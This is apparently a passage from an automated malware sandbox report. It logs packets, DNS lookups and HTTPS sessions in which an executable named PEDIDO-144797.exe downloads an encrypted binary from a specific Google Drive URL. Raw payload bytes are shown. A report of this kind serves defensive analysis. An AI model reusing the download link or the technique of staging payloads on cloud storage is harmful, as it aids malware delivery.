                                                                                                                                        Oct 4, 2024 10:50:46.292593002 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.292809010 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.292865038 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.293144941 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.295705080 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.295928001 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.296338081 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.296597004 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.297322989 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.297573090 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.297631025 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.297884941 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.299730062 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.299988031 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.300051928 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.300316095 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.301784039 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.301974058 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.302032948 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.302227974 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.304219007 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.304419041 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.304478884 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.304701090 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.313375950 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.313590050 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.313657045 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.313863039 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.314343929 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.314594030 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.315720081 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.315872908 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.315948963 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.316211939 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.317811966 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.318078041 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.318145990 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.318341970 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.319839001 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.320085049 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.320147991 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.320415974 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.322024107 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.322221994 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.322282076 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.322475910 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.324429989 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.324640036 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.324711084 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.324908018 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.325932980 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.326179028 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.326236963 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.326505899 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.327687025 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.327946901 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.328474045 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.328716993 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.329888105 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.330154896 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.330214024 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.330492973 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.331547976 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.331793070 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.331851959 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.332082033 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.333453894 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.333661079 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.333724976 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.334002972 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.335519075 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.335787058 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.335844994 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.336097002 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.337094069 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.337341070 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.337568045 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.337812901 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.338778019 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.339021921 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.339920998 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.340121031 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.340207100 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.340481997 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.341866016 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.342096090 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.342145920 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.342364073 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.343441010 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.343663931 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.343724966 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.343944073 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.345561028 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.345813990 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.345880985 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.346131086 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.346996069 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.347245932 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.347304106 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.347551107 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.348587990 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.348831892 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.348896980 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.349143982 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.350219011 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.350456953 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.350521088 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.350764036 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.351840019 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.352042913 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.352097034 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.352324009 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.353624105 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.353944063 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.354007959 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.354300976 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.355186939 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.355453968 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.355520964 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.355796099 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.356726885 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.356931925 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.356997967 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.357260942 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.358290911 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.358486891 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.358546019 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.358793974 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.359877110 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.360089064 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.360150099 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.360424995 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.361377001 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.361644983 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.361690998 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.361979008 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.362835884 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.363048077 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.363506079 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.363672018 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.363727093 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.364008904 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.365026951 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.365236044 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.365297079 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.365492105 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.366709948 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.366954088 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.367018938 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.367212057 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.368161917 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.368371010 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.368436098 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.368657112 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.369622946 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.369821072 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.369870901 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.370158911 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.370888948 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.371591091 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.371634007 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.371906996 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.372478962 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.372642040 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.372689009 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.372988939 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.373887062 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.374138117 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.374202013 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.374474049 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.375134945 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.375334978 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.375381947 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.375405073 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.375423908 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.375459909 CEST44349733142.250.80.97192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:46.375516891 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.375596046 CEST49733443192.168.11.20142.250.80.97
                                                                                                                                        Oct 4, 2024 10:50:46.375597000 CEST49733443192.168.11.20142.250.80.97

                                                                                                                                        UDP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Oct 4, 2024 10:50:42.505361080 CEST5881053192.168.11.201.1.1.1
                                                                                                                                        Oct 4, 2024 10:50:42.612458944 CEST53588101.1.1.1192.168.11.20
                                                                                                                                        Oct 4, 2024 10:50:43.248855114 CEST5740053192.168.11.201.1.1.1
                                                                                                                                        Oct 4, 2024 10:50:43.348310947 CEST53574001.1.1.1192.168.11.20

                                                                                                                                        DNS Queries

                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                        Oct 4, 2024 10:50:42.505361080 CEST192.168.11.201.1.1.10x4a24Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                        Oct 4, 2024 10:50:43.248855114 CEST192.168.11.201.1.1.10x86daStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                                                                        DNS Answers

                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                        Oct 4, 2024 10:50:42.612458944 CEST1.1.1.1192.168.11.200x4a24No error (0)drive.google.com142.251.40.206A (IP address)IN (0x0001)false
                                                                                                                                        Oct 4, 2024 10:50:43.348310947 CEST1.1.1.1192.168.11.200x86daNo error (0)drive.usercontent.google.com142.250.80.97A (IP address)IN (0x0001)false

                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                        • drive.google.com
                                                                                                                                        • drive.usercontent.google.com

                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        0192.168.11.2049732142.251.40.2064436780C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-10-04 08:50:42 UTC216OUTGET /uc?export=download&id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                        Host: drive.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-10-04 08:50:43 UTC1610INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Fri, 04 Oct 2024 08:50:43 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Content-Security-Policy: script-src 'nonce-s69FSt0WE0ru-fW_bG_cSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        1192.168.11.2049733142.250.80.974436780C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-10-04 08:50:43 UTC258OUTGET /download?id=1VfU9JgiArUrPbmMtejanVJrlkqcRREYi&export=download HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-10-04 08:50:45 UTC4899INHTTP/1.1 200 OK
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        Content-Security-Policy: sandbox
                                                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Content-Disposition: attachment; filename="MOMuIrwwyyyhd10.bin"
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Content-Length: 288320
                                                                                                                                        Last-Modified: Thu, 03 Oct 2024 14:06:21 GMT
                                                                                                                                        X-GUploader-UploadID: AD-8ljtCDY1N2MFyrjuaWtEeIbQdzjV2qFVqA43xVMA-BcTRCmFLL2gwc1AZMZsQo8z9Zsa_7SsBM9C6Cg
                                                                                                                                        Date: Fri, 04 Oct 2024 08:50:45 GMT
                                                                                                                                        Expires: Fri, 04 Oct 2024 08:50:45 GMT
                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                        X-Goog-Hash: crc32c=6306Dw==
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close
                                                                                                                                        2024-10-04 08:50:45 UTC4899INData Raw: 46 89 d6 84 4c f9 60 90 41 74 e2 11 a2 db 34 2d c1 89 1c 40 f0 e1 0d 4f 87 71 c7 a4 45 d3 a4 95 0b 53 03 0a 2b 18 a3 fd 49 5d 99 54 3e f8 5c a5 2b 9f 97 b0 c2 be e7 7b 3c 1c 4a 1f 17 da a6 1f a8 e0 7e d7 25 cc ab 01 50 2b a4 fd a7 d0 d1 ef 95 74 b9 b0 f2 d9 08 70 79 ba 1c b9 2b 87 c7 d9 d3 e2 a6 0f cb 30 8b 3d 12 bd d7 47 a9 d9 8f a7 47 17 dc 45 aa ce 1e e9 66 95 29 1f a5 d9 6e 70 86 ad 14 e7 8c f3 5a 5d 9d 60 ad d7 76 53 47 0a 62 3a 34 8d 3c 7f 4d 98 d5 29 f2 22 ae 89 55 ca c2 6f 92 48 04 7a e3 36 d6 39 b8 15 6f f6 fc f2 53 8a 3c 6a 58 f2 43 b0 3e f5 31 f9 63 64 ef 61 36 ce f0 2f 7e 69 95 2e b5 90 c0 7f ba dd ad 0e 27 ad b9 ca 91 6c b6 65 19 96 ea 95 19 94 ed 4f b1 ad 15 47 59 60 17 6d b5 20 47 57 de 10 f8 ef 8f 1e da 08 6b ee 5b ec bb 33 65 17 39 04 9e
                                                                                                                                        Data Ascii: FL`At4-@OqES+I]T>\+{<J~%P+tpy+0=GGEf)npZ]`vSGb:4<M)"UoHz69oS<jXC>1cda6/~i.'leOGY`m GWk[3e9
                                                                                                                                        2024-10-04 08:50:45 UTC4896INData Raw: cd 9f 2a ce 3d f3 25 ad ee 06 1b 6c da d5 06 9d 72 23 af 32 64 9a 70 32 dd 45 32 c6 92 b2 16 54 67 24 68 ad 2a 2a ac 15 7d 60 83 fa 2d 24 d6 ce 96 ea 6f bd 01 e6 13 94 13 ae 60 6e e5 1b be b3 d2 c5 d6 85 1b 02 e4 96 3f dd 3a 9d 26 6b 0d 99 5d 98 bf e6 59 2c a8 b5 76 57 fa 16 59 a4 80 a1 d2 4a 6f 67 29 98 e8 37 a2 22 df d6 d6 66 c3 fb 2d 45 95 f9 fc 32 7a 15 48 b8 f3 de 77 96 b0 47 7d ff 9c cb f8 f9 17 64 be 58 d4 d3 85 4a 35 6a 06 02 fa 57 2e 9f 59 af c5 6c 98 b4 29 b5 24 a5 58 35 0c 60 a9 b2 bf 86 51 4a cf cf 2d a5 99 90 25 8c fc 5e a6 b1 5b b2 f3 c2 e1 3e d5 d4 df eb c1 b0 0b 3a 70 85 03 c0 0e b9 57 82 e8 b7 1c 67 8c f6 ca f0 88 dd 61 52 08 5c 41 98 44 3e e3 2d d8 51 3a e2 c5 8f 71 5c c8 9d 23 6b b5 8f 43 72 33 86 36 c7 65 fb 4e 4e 46 33 49 fd d4 8c 90
                                                                                                                                        Data Ascii: *=%lr#2dp2E2Tg$h**}`-$o`n?:&k]Y,vWYJog)7"f-E2zHwG}dXJ5jW.Yl)$X5`QJ-%^[>:pWgaR\AD>-Q:q\#kCr36eNNF3I
                                                                                                                                        2024-10-04 08:50:45 UTC1255INData Raw: e6 89 69 4f b9 d9 89 b6 73 42 15 26 dd f8 73 c3 4a 90 44 df 5e 47 20 a3 51 03 e8 85 89 16 44 8f a4 d7 d2 ed 1e ea 26 50 64 89 11 12 0f fd ee 7d b1 f8 e1 73 1d b9 70 56 fc 61 22 9b a7 e0 04 ea 5a 09 3c 7e 64 37 0b 1d 93 8d c5 ec ae 81 27 ae a2 54 bf 05 e8 e8 d5 a2 c1 47 b9 84 fe 12 3b ba 5a f8 71 92 16 f6 d7 07 d4 71 82 b1 42 14 e0 30 7d eb dd 7a e9 fc 43 62 ab f9 53 bc f6 c9 40 ec e2 db 3a 79 c9 49 d0 99 7f 74 a3 9b 4e ae aa cf 54 44 88 52 a5 ac 50 a1 94 eb ca 5f 15 36 43 b6 51 8a b1 a0 95 b2 84 b4 39 7b 07 4a 08 be 40 ff ad 20 fc 65 5d 07 f2 b0 22 0e c2 b2 79 df ac 66 11 cc ff b3 57 36 b4 cf 3b 40 b4 cd 78 56 11 f6 9b 57 10 3d d5 bc 71 27 b4 55 3d aa 32 69 13 8d 4e d5 41 8a 06 e5 1e ba 32 f4 7e 3e 60 0d e1 b3 ef a1 dc 44 16 90 82 83 9b 32 89 3b 0f b1 d0
